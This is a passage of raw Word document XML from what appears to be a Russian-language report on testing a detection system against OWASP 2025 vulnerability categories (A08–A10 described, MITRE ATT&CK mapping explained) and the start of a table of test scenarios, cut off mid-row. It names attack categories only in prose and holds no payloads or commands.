        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бои целостности программного обеспечения и данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Уязвимости, возникающие при использовании ненадёжных источников обновлений, плагинов и библиотек без проверки их целостности. Включает атаки на цепочку поставок и несанкционированную модификацию программных компонентов, в том числе файлов нейросетевых моделей</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65752369" w14:textId="7337CC0C" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> —</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бои</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> журналирования и мониторинга безопасности.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отсутствие или недостаточность регистрации событий безопасности, что позволяет злоумышленникам длительное время оставаться незамеченными. Без надлежащего аудита невозможно своевременно обнаружить инцидент, провести его расследование и восстановить хронологию событий</w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A368821" w14:textId="3E9BE125" w:rsidR="007D635C" w:rsidRPr="00DD2F4C" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 — </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>одделка запросов на стороне сервера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Уязвимость, позволяющая злоумышленнику вынудить сервер выполнять HTTP-запросы к произвольным ресурсам от своего имени. Это позволяет получить доступ к внутренним сервисам, недоступным извне, обойти средства сетевой защиты и проводить разведку внутренней инфраструктуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DC652F" w14:textId="045BF9AB" w:rsidR="008E0171" w:rsidRPr="003F22C2" w:rsidRDefault="007D635C" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D635C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Помимо классификации OWASP, для каждого тестового сценария приводится идентификатор техники из матрицы MITRE ATT&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00305EE7" w:rsidRPr="007D635C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CK</w:t>
      </w:r>
      <w:r w:rsidR="00305EE7" w:rsidRPr="00305EE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="0056080C" w:rsidRPr="0056080C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00305EE7" w:rsidRPr="00305EE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="007D635C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — международной базы знаний, систематизирующей тактики и техники злоумышленников на основе реальных наблюдений за кибератаками. Матрица широко применяется в мировой практике для описания поведения атакующих на каждом этапе вторжения — от первоначального доступа до достижения конечной цели. Идентификаторы вида T1046, T1110 и другие однозначно указывают на конкретную технику атаки, что позволяет сопоставить результаты тестирования </w:t>
      </w:r>
      <w:r w:rsidRPr="007D635C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>с реальными сценариями угроз и оценить покрытие системы обнаружения по отношению к актуальным методам злоумышленников.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21281095" w14:textId="45858EAF" w:rsidR="00106F01" w:rsidRDefault="008E0171" w:rsidP="002A245A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлен перечень тестовых сценариев, разработанных в соответствии с классификацией OWASP</w:t>
      </w:r>
      <w:r w:rsidR="007D635C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2025. Для категорий с несколькими векторами атак подготовлено по несколько сценариев с использованием различных инструментов, что позволяет провести более полную оценку эффективности системы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675408DC" w14:textId="77777777" w:rsidR="002A245A" w:rsidRDefault="002A245A" w:rsidP="002A245A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A98489E" w14:textId="67D2EDAB" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Перечень тестовых сценариев по категориям</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1448"/>
        <w:gridCol w:w="4961"/>
        <w:gridCol w:w="3367"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="575DBF9B" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F26B514" w14:textId="115BC27D" w:rsidR="008E0171" w:rsidRPr="003617AD" w:rsidRDefault="003617AD"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Категория</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFDBEC0" w14:textId="2AF59589" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="000A1CD6" w:rsidP="00AB6434">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Название категории</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438B703D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Тестовый сценарий</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="7A771069" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="557"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428C8948" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247B5F2F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Нарушение контроля доступа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BFF4140" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Настройка р</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>азграничени</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>я</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA46A4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> прав доступа</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00DA46A4" w14:paraId="34528ECE" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44BD7605" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33656A9E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="000A1CD6">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Криптографические сбои</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B81034" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DA46A4" w:rsidRDefault="008E0171" w:rsidP="00AB6434">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Контроль целостности модели</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A1CD6" w:rsidRPr="00DA46A4" w14:paraId="04219CC8" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="513"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AEDA12" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000A1CD6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3D4E99" w14:textId="017A38FA" w:rsidR="000A1CD6" w:rsidRPr="00A7269E" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="138558FE" w14:textId="33C29944" w:rsidR="000A1CD6" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000A1CD6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Инъекция</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FD34A5" w14:textId="1B1FF339" w:rsidR="000A1CD6" w:rsidRPr="00A7269E" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3367" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD9A1D1" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00DA46A4" w:rsidRDefault="000A1CD6" w:rsidP="00AB6434">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SQL-инъекция</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A1CD6" w:rsidRPr="00DA46A4" w14:paraId="40AF57AD" w14:textId="77777777" w:rsidTr="000A1CD6">
        <w:trPr>
          <w:trHeight w:val="339"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1448" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18884D92" w14:textId="298A175B" w:rsidR="000A1CD6" w:rsidRPr="00A7269E" w:rsidRDefault="000A1CD6" w:rsidP="000A1CD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
